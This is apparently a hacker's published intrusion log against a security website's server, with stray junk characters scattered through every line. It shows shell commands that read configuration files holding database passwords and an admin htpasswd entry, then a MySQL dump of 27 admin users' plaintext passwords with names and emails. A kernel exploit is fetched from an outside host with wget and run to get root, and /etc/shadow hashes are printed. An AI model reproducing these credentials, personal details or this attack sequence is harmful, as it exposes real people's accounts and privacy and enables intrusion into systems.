drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
( S* X; R$ c/ O/ Cdrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd' Z6 I6 A, P8 ~- K2 X
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php( c8 M1 U* c( f! `) ?; t
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico: u" F" K; `/ C7 |0 ^5 I
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed7 j8 t" Y5 A0 R5 ~9 Y
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
/ q' c' {' a2 s; | `, O-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
) E* ]/ ]0 j, K/ o5 `-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess: f7 Q1 N* s0 L
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php" [* R9 r, U: }6 [& Q' L* D5 M
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
% `+ [; o. e3 ]7 @- E. j: m' e-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
( \$ E4 N) b2 `1 ]-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php
$ N" h, p/ b1 ^ W4 ?7 X3 m-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
/ x2 P# ]8 E" v/ M; ^0 Ydrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc% l3 B1 O7 y( \* @& S# E
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang6 ~- V: v: Q8 B
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
% n- ?5 c8 z) u: vdrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
F6 y1 @/ q& D, q& f' p( \4 x' {drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member* ~1 M* ~3 N8 N
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata) C! U& _ ?4 v& p7 Q O
drwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new* i# F) g& ^' `
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
) B& A+ [* P7 m3 y( Cdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
8 b. s# E: Q5 |0 ?! z-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
- J3 A( R: o1 xdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
) B7 j. S8 P0 [: ^+ A2 E2 Sdrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
! W) _% A1 r9 y% c/ e) `1 wdrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com v. E& t* {3 q& E
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes7 J7 G% C: R, q- M) r& K- r4 f
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
3 ?8 d4 _- X& C5 \drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl" ~: A- F6 a) @# `% f/ Z5 ]
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
7 {1 Z8 ?* R' {# Udrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old% G; I( w! C0 k- G! J. m- S) L( U6 U
-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php+ `8 B0 V8 B/ H3 T; q& r: P
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
1 L; ^2 [3 T: \# a+ b N& x, Q% I3 m- Z: l6 ?
sh-3.2$ head -20 index.php, e: h) \# G x' p& \& Z ?
<?PHP4 q9 w; L# }# b1 y9 m, a: G7 d8 k) R
/**
6 Q3 g$ x# P* {7 S* Mainfile (external) for astalavistaNET v2.0
/ a* Z x- ~. ` S*
& `8 k3 Q' }2 l* @copyright Astalavista IT Engineering GmbH
' f7 r$ q9 Q D: }5 O* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
- e$ ?' T: R" w# a7 w! Z* @version 1.03 i I8 o7 X8 ~' r2 l
*/4 j! C7 q/ ~: R/ ?$ ~( R
/ ^5 f* e% M* B: b, n3 | if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {
; |1 M# X* t& |3 t0 v, d5 [9 l- U $dontStartSession = false;
" B' o; m1 f; M+ R } else {2 |% Q8 k! b r1 M' H
$dontStartSession = true;
; N3 _* P8 @, L- p# o0 L: ~ }
% F, o' A" [( t+ J9 W$ j6 j* ` require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
) @- Y8 c7 f6 ]9 F) z& l require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
! j; b9 ?$ v5 n4 s4 V4 H require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
! w$ j7 M& ?3 |2 ]4 z require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
6 [$ _( H6 @ _+ t, H, K+ K0 V! r* w5 F9 l7 N: j
sh-3.2$ cd config
9 o9 Q M2 m6 Ksh-3.2$ ls -la! `( I2 D4 O4 M& A3 k6 L
total 32
! R8 q S/ ~# D: idrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .9 a" {! M9 E2 d9 O. G$ C
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ S) Q! ~, F+ p+ u; P d$ G0 T
-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php: h6 y# U& J8 ?1 G- F+ B0 Q
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php0 x; ?/ z' f3 q% V
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php4 {9 a" i: X) J( z$ z6 Y
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
% A- Z2 [; a% @- M( I C-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
7 d8 u% t8 I' {2 X6 v8 c- G9 O9 |' M! m r0 z- w: i8 q
sh-3.2$ cat com.conf.php
2 h/ F2 q* p- I[snip]
: Z7 u1 c% [- }& t2 ]! B% p c4 ]//member-database
6 V; {1 \* u+ ~2 \3 n! S$_CONFIG['db_mem_server'] = ‘localhost’;2 G, p' O. i: V- E
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;( c% C- F* y7 }! U: \! O6 X
$_CONFIG['db_mem_user'] = ‘astanet_db’;
/ V, g9 e# O) `7 n" T5 d. z* j$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
1 n$ ]5 h! Y, _" X# Y. e: o# W9 }$_CONFIG['db_mem_debug'] = false; //true or false# s! q$ j! U/ s) \$ D- H
//ads-database
7 l1 F I/ B' y4 k: R5 b$_CONFIG['db_ads_server'] = ‘localhost’;/ a$ w! G4 Z# C2 K4 m# p$ p
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
7 W2 P( l% I2 h+ i+ z' L5 O2 a9 ]$_CONFIG['db_ads_user'] = ‘astanet_db’;; W" k& x: p0 V+ ?0 E' i
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;
, X1 w4 X7 ^& y6 r7 u$_CONFIG['db_ads_debug'] = false; //true or false9 l$ V+ y% }2 Y+ ]6 K( e: G x/ }
//rainbow-database# L% [" J' i. ?) C2 B. C
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
. @& h. E' o, v- J) }1 z* V. e$_CONFIG['db_rainbow_database'] = ‘rainbow’;
. b6 a6 Q' O6 v/ G$_CONFIG['db_rainbow_user'] = ‘dinu’;* F- R6 n6 Y$ r8 O* \' |
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
) x f, B6 H; r$_CONFIG['db_rainbow_debug'] = false; //true or false
6 D7 K& l6 q2 [3 B( N//mailing lists database
9 W3 a% V: @# ]) X1 D% y: W$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
2 H' a/ C1 ]* j( }# o$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;4 i4 d: e& _# Z$ x* r2 E! g
$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;; b. ~+ A( V/ ^% ~& q
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
2 U2 w& m; C: q- c2 R. s$_CONFIG['db_mailing_lists_debug'] = false; //true or false
9 d2 t) j4 H8 \6 O7 z//paypal2 J: D6 d$ o/ R( r& x4 T
$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;4 h3 S. p; M) u' B2 z- {' h* O5 w
$_CONFIG['sub_pp_cmd'] = ‘_xclick’;3 e! W% e+ k& D; r; k
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
% B( m8 Q( w+ G: C" F- \$ P1 g+ q$_CONFIG['sub_pp_noship'] = ‘1′;# z& Y1 f: V0 y
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;5 ~0 e6 d* |- T0 P2 D& b
[snip]& m d1 f9 Q: J, R
" U! ~' f' Q/ z+ l& T9 [8 Hsh-3.2$ cd ..
& r9 e8 j, e- n! q L, @1 Y, Ssh-3.2$ cd member
# b o1 A. Y$ m! l$ {* Ysh-3.2$ ls -la
+ Y1 _1 c V4 i+ O1 U; r' e$ u( Q+ P5 Htotal 205 u' \, R; C: t8 S# G. l
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .5 s7 X( u5 L- R" y* ^5 o
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ M, E" r3 P/ h6 H% l+ a3 n
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess. G/ _' ?& ^ C: W. i; C5 x
-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
+ g$ u5 C& j, J' Ash-3.2$ cat .htaccess4 a& V( k; n) a2 x
SecFilterEngine off
- l5 `4 ~8 C/ ^# X" v% n% u# ?$ \/ D4 x
sh-3.2$ cd ..2 k4 Z o) C# g2 q" i( X, n' P; B
sh-3.2$ cd cron; L% g6 N+ T5 @6 H3 j' H2 X( B+ R3 Z
sh-3.2$ ls -la- [3 X @& ]( C j1 J6 N
total 168# k+ M" l& |$ o; x
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .) Q; Y" k( ], d# M7 o' i5 G
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
: x8 n6 l8 B- @- `$ U% F, @+ P, `-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
/ i8 |$ r; [( B7 ]-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php" l/ i0 ]* v0 t7 L
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php
0 z# h, Y* l5 z-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
4 g; A* \& N4 J4 D6 G* r4 W- n-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php. C( Q5 N+ w3 _2 t \
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php# A( B$ F1 w x7 `/ F1 x
-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php: X/ e& r3 n) \) j) \/ U
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
, V- C2 k% E7 D, J# @-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh
' [! h, J4 e2 M: X' ] ]-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php
" F. t, \0 I3 w( e$ r-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
% j6 s1 v |1 f- `8 o-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
4 f% A& B2 r/ T* d1 P0 W( T% E-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
; |2 v. E* {- y. b$ d-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php( [, B0 `' T6 {, \! c9 J5 `
-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php
* m) b. s# d1 c' u o' h( @-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php; x5 [* S( z+ u h. R; g! |
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
: U9 e6 }" g" `0 w( ?5 g-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php; b; a3 [" r4 O L1 R
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email" u3 J" W; P, a" _2 ~' ]' A
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php+ ~* ^7 N5 ?) v; }# Y9 \& Z ]3 U
-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php7 m' _' S! {# z$ f" R7 h; c' F8 [' W
( n/ s a* f2 ~. Vsh-3.2$ cd .., Z# L2 j! P. \3 U; \, m
sh-3.2$ cd _007
: l; P" D# N# Y% Z- N$ _sh-3.2$ ls -la$ b+ G5 X# J( W
total 247 Q8 |& J. F/ N1 b
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .8 i! E& p( S/ X5 d5 A0 X
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..+ T# R, E* i q+ ^/ L- k5 Y3 P1 W
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess M+ e+ R b8 Z% I, k
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php) J1 \' B5 A" A% H6 j
-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php$ k2 L" o5 l2 U( [6 W
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap& f; K/ f; s" \# c7 W; ?) K4 O
9 K) n' p. ~, |% U3 `sh-3.2$ cat .htaccess U* _- z6 e& {2 F3 F. J) s8 v: [
authType Basic* `+ I) U3 R3 u. d. o9 H+ C
authName Admin
3 F% }8 F6 g2 j0 iauthUserFile /home/astanet/auth/.htadm_pwd
! }8 L3 c V# k" b2 T4 c0 | Wrequire valid-user: O7 o5 m! O0 E: [- w# ^
: B- d8 Q/ y' Q! @& K, V* F
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
' F( Z$ m3 z q% c& z+ madmin2net:CR0bl65MwhfT& e& l4 w2 t7 G7 V
; g4 s& ?5 T7 D7 W5 a: v8 _3 g, |
sh-3.2$ mysql -u astanet_db -p
( W- x; D6 L0 c YEnter password:
- ^3 H) e9 P: L4 wWelcome to the MySQL monitor. Commands end with ; or \g.
6 C6 _4 k* V, s( `! `Your MySQL connection id is 275153! _ M8 i, ]- W% W& n$ g+ C
Server version: 5.0.45-community-log MySQL Community Edition (GPL)( Z; k# @) ^% i' p3 N# y
/ j3 [' K7 U* e* g. H0 v, t
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer. b6 r: i; g4 i( u$ l1 F Y6 Z
7 Y/ w) X4 I8 K0 c$ P0 [8 w* ymysql> show databases;+ ?) T( N) c+ e
+———————–+
$ z |' i+ m/ \ @# d8 I q8 {) q& \| Database |
$ z, e$ S( d& t( b' X5 w+———————–+
{5 m/ M( m+ n| information_schema |, A6 j' D' Z- [( \8 A" Z
| astanet_ads |
: w3 w0 ~( n8 i' g A# O- c| astanet_mailing_lists |9 Q: y3 u& M' h6 U! ?, n% a0 V
| astanet_mediawiki |7 d- |- Y7 k+ i' d# `; j6 P) v
| astanet_membersystem |/ z* S! B7 Z7 }* c. u( C
| test |& m8 R! g, K7 S5 |% S$ w) M
+———————–+
R. o- n& H5 P$ u$ G2 }3 R) f6 rows in set (0.00 sec)
# P2 f! F& G3 A5 u0 H1 ~
" u) O& S& {$ N, }mysql> use astanet_membersystem# A. u' C' k+ q v" L1 E( y
Database changed8 ~1 O/ v2 ~! Z C
mysql> show tables;& F. k3 C5 G) o- J/ ]. u
+———————————–+" {4 u( |0 I9 M' U( M ]
| Tables_in_astanet_membersystem |
: B. [* x7 O n- L+———————————–+
+ v4 Z; \5 N0 ?- E6 |8 _| blacklist_categories |
* K: e" Q5 \; v* X: H| blacklist_content |
# {# k+ k% T! j" f2 Z* g| blacklist_levels |& ~% e6 a" }0 B- l
| blacklist_mcset |& @ ~: ?2 B. }4 o$ c* g+ f( g
| dir_categories |
/ ^, Q/ l) U7 T8 M" e2 r" C6 V| dir_comments |
; q; ~6 P4 Q2 b* L5 p- E8 Z| dir_links |
% b: [2 z" g$ }- y% \; }| dir_temp |/ f! U. K( G7 {4 Y
| dir_votes |, _" g$ h& b, H4 @1 E4 c/ ?! ^& S0 q
| documents |+ g5 {( b1 k; E- [0 R ^. a
| documents_categories |. j; U) ~, y3 ]& l" h& L
| email_content |2 ]; V$ h/ m! Q
| email_settings |
2 R9 h- n$ F. I# \3 k% O# \| exploits |& o5 V! y. P [
| exploits_categories |' S/ n9 ~$ r: w! l8 S- L- U0 C
| exploittree_categories |, @# p- u5 O& K6 c7 ~* ^1 h
| exploittree_exploits |
8 r7 s$ d+ ~ d3 L| home_values |
) U. c6 `+ p( a6 l| iso_countries |! h% d! k% O3 c P4 f2 u3 z
| links_categories |. b+ j' r. S6 g- Z8 h G
| links_records |- k! s2 \% p5 f6 d6 H* Q
| links_unauth |7 p! D4 u! R: D, |# [5 v$ y
| links_votes |( c' F: D5 J% {) H3 r
| log |9 x, h7 r8 k$ {
| news_categories |
7 ]; C2 }5 z+ S1 r" h5 j6 }7 j- m| news_comments |) E$ K; a, R8 O
| news_emoticons |
4 V- F' X/ g$ L, _( p u/ a$ Q| news_latest |
7 t; X1 t0 @0 w8 Y0 C| news_messages |2 j; O& x( R" e0 R9 X/ Y, q
| news_statistics |3 A4 I% n' x& N/ f& E
| news_votes | v/ j; T& F. R J2 ^, }1 U& P0 b
| prices_content |
8 P6 `+ Q5 {7 C( m| prices_offers |' D, D( K2 x3 h
| rss_settings |9 m, ?# y; u6 [
| sessions |1 r% h' S# J/ G9 V
| stats_signups |$ Q6 i/ u2 L6 P) W# X
| u2u2 |
6 b8 E4 V9 n! ^/ K; ] }. h| u2u_contact |5 h8 L7 h( s0 r5 N
| u2u_settings |) N$ g B$ t' ^& L
| user_keywords_selected_categories |. a/ d+ D* N1 x
| users |
' p* F$ F: g8 |' g2 a$ i| users_ipn_test |
9 g) W% U8 k7 @4 P/ q3 F| users_keyword_values |
: l: a7 A+ f3 f: B2 s+ G% }| users_profile | @5 m) ~# t8 D9 J& _
| users_temp |' |3 G1 e f' s$ N
| users_upgrade |
" w$ ^( N7 p0 Y1 k1 h+———————————–+
# }' f% S5 u# B2 U+ z46 rows in set (0.00 sec)
7 S: S, Z/ z% o% j9 `7 i/ p' s+ W3 g* L: q, i( i
mysql> describe users;+ D. ^ d& D- j: ^6 N
+————————–+————————————–+——+—–+———————+—————-+
& t; y5 e; M# M5 i" v5 ?| Field | Type | Null | Key | Default | Extra |
+ n" e- v% T5 B. o6 \9 T0 m' x+————————–+————————————–+——+—–+———————+—————-+
8 F1 u! v! T# ~5 M. g| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
4 f @+ T' u* x: }! W| user | varchar(50) | NO | | | |) d3 N" ^# o" ]" a) i/ H( `
| nickname | varchar(30) | NO | MUL | anonymous | |
7 A) H; S( c$ t5 Y& i0 V9 || password | varchar(30) | NO | | | |
5 O1 w3 i" V4 z1 ]0 v3 o) K| userlevel | tinyint(3) | YES | MUL | NULL | |
; T4 E2 i! q, h8 l3 `0 @+ _| exp | int(8) unsigned | NO | | 0 | |0 i. H. P. w: K1 L: z5 l8 s
| email | varchar(50) | NO | | | |3 G3 ^9 K D3 y. N
| ip | varchar(15) | NO | | 0 | |% C) f+ J) I1 i0 e& |/ [
| proxy | set(’0′,’1′) | NO | | 0 | |' C+ G& `2 ], H1 {# @9 n4 `" y
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
) v8 R; j4 c7 S/ C$ [% p| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |$ ~; B7 ?% D* H! Z4 H% ]
| anz_in | tinyint(1) | NO | | -1 | |7 {! u5 p2 g+ Y( S# V# m7 `
| status | tinyint(1) unsigned | NO | | 0 | |2 H; X u' m6 P' j6 C
| checked | set(’0′,’1′,’2′) | NO | | 0 | |
0 F1 p4 u6 E1 [# P2 m| freemember | set(’0′,’1′) | NO | | 0 | |
" z# ?6 P3 ?, v& U$ N1 ]' T| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
6 v0 P( T& _' Y N. ]! \) ]1 k" O x| lang | tinytext | NO | | | |$ P @- q9 _3 q8 z* Q" j
| adid | smallint(6) | NO | | 0 | |! f7 h% O6 t6 W& U6 s
| pp_txn_id | varchar(255) | YES | | NULL | |
0 @# |$ _4 L& G% H: k9 }. z6 U| cnb_transaction_id | varchar(255) | YES | | NULL | |
6 X1 |9 o: o/ I0 D8 F| cnb_order_id | varchar(255) | YES | | NULL | |
& r) F3 P7 g. F3 e4 D! p| cnb_user_id | int(11) | YES | | 0 | |
1 Z. y3 C* I4 X9 v; u, K. k8 l* b+————————–+————————————–+——+—–+———————+—————-+
4 D# n# p8 ?% G% P9 E2 w% l22 rows in set (0.01 sec)
( @1 d9 v }9 `. J
& u: y6 Z. p$ m2 M! t: Rmysql> select count(*) as skids from users;) Y( C+ { W2 O2 ]
+——-+
( p2 R" w0 N# \* C' I| skids |
2 E, q6 d. X% h& k. w+——-+
! S) i4 K2 H8 i( k d| 25199 | w% V z8 {, S+ @* j
+——-+
" h+ Z* y5 f5 f; X& A% |1 R1 row in set (0.00 sec)5 O9 I; S* b6 i% w
- Y- `4 L$ }$ R7 M( Z+ |% I
mysql> select user,nickname,password,email from users where userlevel = 1;
; Y t3 J& e A. n4 A, Z4 v2 G" X+————————–+———————-+——————+———————————–+% S+ @* j" W1 @( _" @
| user | nickname | password | email |
1 [6 f( h: ~& x4 P2 T+————————–+———————-+——————+———————————–+( m- V6 l9 b4 U" h7 Z. c- F
| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
. m6 w4 N1 L5 j# l3 `* E X| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |- A" n4 C% t1 I& a/ Z$ L: N* C
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |# w5 f& V8 A9 M' f6 }, K) u/ q% @: P
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |. g& D* a2 V- s
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |- e7 C# H; o7 V" a6 ^
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
1 m: Q) B' r1 y5 K( d* B| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
% c( f6 Y' p- M2 ^; w| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
& R; N5 b6 E/ e. W| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
! R. ]5 C6 I9 O2 j# q. R) m| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
' y) B' q6 a4 c4 u* p| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |, Z& C2 n5 a" ^- v
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
, q% u' t) `( ^# {$ p| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
# B+ q' o& Z& g# t" P* B8 _0 W| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |$ k% M4 J* `. |& p+ u
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
9 q4 g* Q% N: M$ [1 S+ X$ Z| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
5 a5 M+ c& ]8 w7 W2 n; ?" ~2 w| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |/ v$ Y! l8 I4 ^# q! A* B; d
| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |* F Q, i2 v$ x, ?+ }8 ~
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch | ? b8 s$ V) E3 n* p2 V l' S
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
& f2 ]0 c; A ~3 K h& R- I| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
. U8 t! {: Y7 e- v$ Z- |1 e' N| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
' c) X: m: ]) S! `. ~2 X- Z% b( E| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
: r I3 m% T- J" y0 l9 g| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |, K, D; H9 W! Z) a- |: d
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |
7 X, g* r, L6 Q| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
x6 i3 d# P9 W" }7 B, I| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |7 I9 }+ Y) P5 o! R3 z
+————————–+———————-+——————+———————————–+( y& j" d9 g* b( [( e, E0 `
27 rows in set (0.00 sec)" m8 K: `1 G& {8 _" i2 A
4 ~( D0 E5 c7 @( o) y3 U- e
mysql> exit;4 X$ N' c3 k4 n, w9 Y
Bye! T. X- n1 X8 {! r/ E
4 [* l2 C# g5 Q" A" n8 L! e
[~] plaintext passwords? yes,. _0 |) J" r/ S
Those so called “security professionals” who charge you $6.66 / month to! {3 f* B# B# K: J% [8 {5 R
register at their hack-proof portal, save your passwords in plaintext…
% q8 h7 a' D* K5 N1 V8 Wbrilliant!- L- E* U/ N7 w4 h- g
8 y. e3 [" s D7 u5 |
[~] This been fun but we want more.
2 K% Z; `! o0 \/ ?" U( @" a3 X
; m: e* f8 \# t) [8 Xsh-3.2$ uname -a8 e" V* ^2 B5 E R* J+ I
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux" a( h. A( a( n
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
& k# F& E7 }5 `% f" Q0 N1 ^–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]1 _) ?& X+ z& H: p4 ]
Resolving anti.sec.labs… 13.33.33.37
# A& X7 B S# |* n4 I' n- FConnecting to anti.sec.labs|13.33.33.37|:80… connected.
+ J2 k' U2 h" j' F, P! M8 y a% }* d& \HTTP request sent, awaiting response… 200 OK
2 @9 m/ T* M: h' zLength: 18200 (18K) [text/plain]
L6 q0 l0 m: n2 a9 j' s) vSaving to: `g0troot’
2 K K) G& ~- Y
0 o' i7 C9 S- }! `- D) [2 z0 N100%[=========================================================================================================================================>] 18,200 58.6K/s in' ?: I( y) J! T/ y F3 V7 H, S3 d
0.3s7 j8 }% t* H+ W( ?
# j+ U9 t, C: k7 N" I( k& j# v
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]
1 H3 S3 O2 F |) ~/ f
; K2 \# J S5 T ]- lsh-3.2$ ./g0troot -i x86_64; |3 i+ R2 B$ \! h3 W
[+] g0troot - anti.sec.labs2 m+ ~$ w! B" [2 }% o) y
[+] Target: 2.6.18-128.1.10.el5+ Y0 s9 n. K; o- i. ^
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]$ Y. m3 N% e1 B" d9 N
8 E" K0 z$ a0 O" V2 R8 v$ t# ^[+] r00tr00t
K$ N! U: ]; X" ^+ {[~] Executing shell…
3 C/ I8 Q1 n+ q! {8 ?7 A0 f8 ~0 g( p
% A' w/ ?4 V5 F- D$ P. qsh-3.2# id
* E4 V" D4 z7 Tuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)/ @. B" w( o. @6 E/ M2 _) C1 }
4 G$ R* Q& e- F$ D; X0 z1 V4 Q, d% nsh-3.2# cat /etc/shadow5 W2 u% Y9 e- F" }" k$ ^9 E
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
6 p' _9 V$ { M: J% ~[snip], _, j; x7 c" s4 R
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
z }1 x& d/ k0 h0 N5 |$ u% D! yjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
( ^7 t: m/ C* o2 Icom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::5 z' [7 X; Z- I% E& y
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::" c2 t2 t3 v& }8 l Z `1 ~0 U
6 s, J9 C5 I% W* v/ T8 {sh-3.2# cat /etc/motd( A P! f+ y7 _0 Z6 G
#####################################################/ ?* H9 V7 ?5 }) j8 ~, Y! }5 N0 {
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #' s3 k4 G% O, W D8 q
# |__| [__ | |__| | |__| | | | [__ | |__| #
x+ t/ x' i: D' v$ N# | | ___] | | | |___ | | \/ | ___] | | | #
/ c) U; d& x, t# #
. R; a! x# o# F#####################################################
9 X5 ^% [8 H) ]# #
